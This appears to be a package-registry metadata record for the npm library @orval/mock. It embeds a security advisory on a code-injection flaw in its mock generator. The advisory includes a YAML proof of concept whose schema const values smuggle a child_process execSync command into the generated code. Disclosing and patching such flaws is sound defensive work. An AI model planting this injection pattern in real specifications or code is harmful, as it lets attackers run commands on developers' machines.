{"id":8604376,"name":"@orval/mock","ecosystem":"npm","description":null,"homepage":"https://orval.dev/docs/guides/msw","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/orval-labs/orval","keywords_array":[],"namespace":"orval","versions_count":76,"first_release_published_at":"2023-11-28T10:15:45.540Z","latest_release_published_at":"2026-04-15T13:43:10.735Z","latest_release_number":"8.8.0","last_synced_at":"2026-04-16T12:11:49.228Z","created_at":"2023-11-28T13:56:02.178Z","updated_at":"2026-04-17T04:12:19.195Z","registry_url":"https://www.npmjs.com/package/@orval/mock","install_command":"npm install @orval/mock","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"7.0.1","rc":"8.0.0-rc.6","latest":"8.8.0"}},"repo_metadata":null,"repo_metadata_updated_at":"2026-04-16T12:12:00.314Z","dependent_packages_count":1,"downloads":4600713,"downloads_period":"last-month","dependent_repos_count":2,"rankings":{"downloads":1.588871276556626,"dependent_repos_count":7.624845079674312,"dependent_packages_count":20.938335483624662,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":10.050683946618534},"purl":"pkg:npm/%40orval/mock","advisories":[{"uuid":"GSA_kwCzR0hTQS1mNDU2LXJmMzMtNDYyNs4ABRYW","url":"https://github.com/advisories/GHSA-f456-rf33-4626","title":"Orval Mock Generation Code Injection via const","description":"I am reporting a code injection vulnerability in Orval’s mock generation pipeline affecting @orval/mock in both the 7.x and 8.x series. This issue is related in impact to the previously reported enum x-enumDescriptions (https://github.com/advisories/GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core.\n\nThe vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. I have confirmed that this occurs on orval@7.19.0 and orval@8.0.2 with mock: true, and that the generated mocks contain executable payloads such as require('child_process').execSync('id') in the output TypeScript.\n\n```yaml\nopenapi: 3.1.0\ninfo:\n  title: Mock Const Injection PoC\n  version: 1.0.0\npaths:\n  /test:\n    get:\n      operationId: getTests\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                $ref: '#/components/schemas/Tests'\ncomponents:\n  schemas:\n    Tests:\n      type: object\n      properties:\n        EvilString:\n          type: string\n          const: \"'); require('child_process').execSync('id'); //\"\n        EvilNumber:\n          type: number\n          const: \"0); require('child_process').execSync('id'); //\"\n        SafeEnum:\n          type: string\n          enum: [\"test\"]\n\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-22T18:09:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/orval-labs/orval/security/advisories/GHSA-f456-rf33-4626","https://github.com/orval-labs/orval/pull/2828","https://github.com/orval-labs/orval/pull/2829","https://github.com/orval-labs/orval/pull/2830","https://github.com/orval-labs/orval/commit/44ca8c1f5f930a3e4cefb6b79b38bcde7f8532a5","https://github.com/orval-labs/orval/commit/6d8ece07ccb80693ad43edabccb3957aceadcd06","https://github.com/orval-labs/orval/commit/9b211cddc9f009f8a671e4ac5c6cb72cd8646b62","https://github.com/orval-labs/orval/releases/tag/v7.20.0","https://github.com/orval-labs/orval/releases/tag/v8.0.3","https://nvd.nist.gov/vuln/detail/CVE-2026-24132","https://github.com/advisories/GHSA-f456-rf33-4626"],"source_kind":"github","identifiers":["GHSA-f456-rf33-4626","CVE-2026-24132"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-22T19:00:08.235Z","updated_at":"2026-04-17T04:01:35.862Z","epss_percentage":0.00049,"epss_percentile":0.15073,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mNDU2LXJmMzMtNDYyNs4ABRYW","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mNDU2LXJmMzMtNDYyNs4ABRYW","packages":[{"ecosystem":"npm","package_name":"@orval/mock","versions":[{"first_patched_version":"8.0.3","vulnerable_version_range":"\u003e= 8.0.0-rc.0, \u003c 8.0.3"},{"first_patched_version":"7.20.0","vulnerable_version_range":"\u003c 7.20.0"}],"purl":"pkg:npm/%40orval%2Fmock"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mNDU2LXJmMzMtNDYyNs4ABRYW/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@orval/mock","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@orval/mock","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@orval/mock/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fmock/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fmock/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fmock/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fmock/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fmock/codemeta","maintainers":[{"uuid":"melloware","login":"melloware","name":null,"email":"mellowaredev@gmail.com","url":null,"packages_count":21,"html_url":"https://www.npmjs.com/~melloware","role":null,"created_at":"2025-08-25T15:17:10.196Z","updated_at":"2025-08-25T15:17:10.196Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/melloware/packages"},{"uuid":"anymaniax","login":"anymaniax","name":null,"email":"anymaniax@icloud.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~anymaniax","role":null,"created_at":"2023-11-28T13:56:03.539Z","updated_at":"2023-11-28T13:56:03.539Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/anymaniax/packages"}]}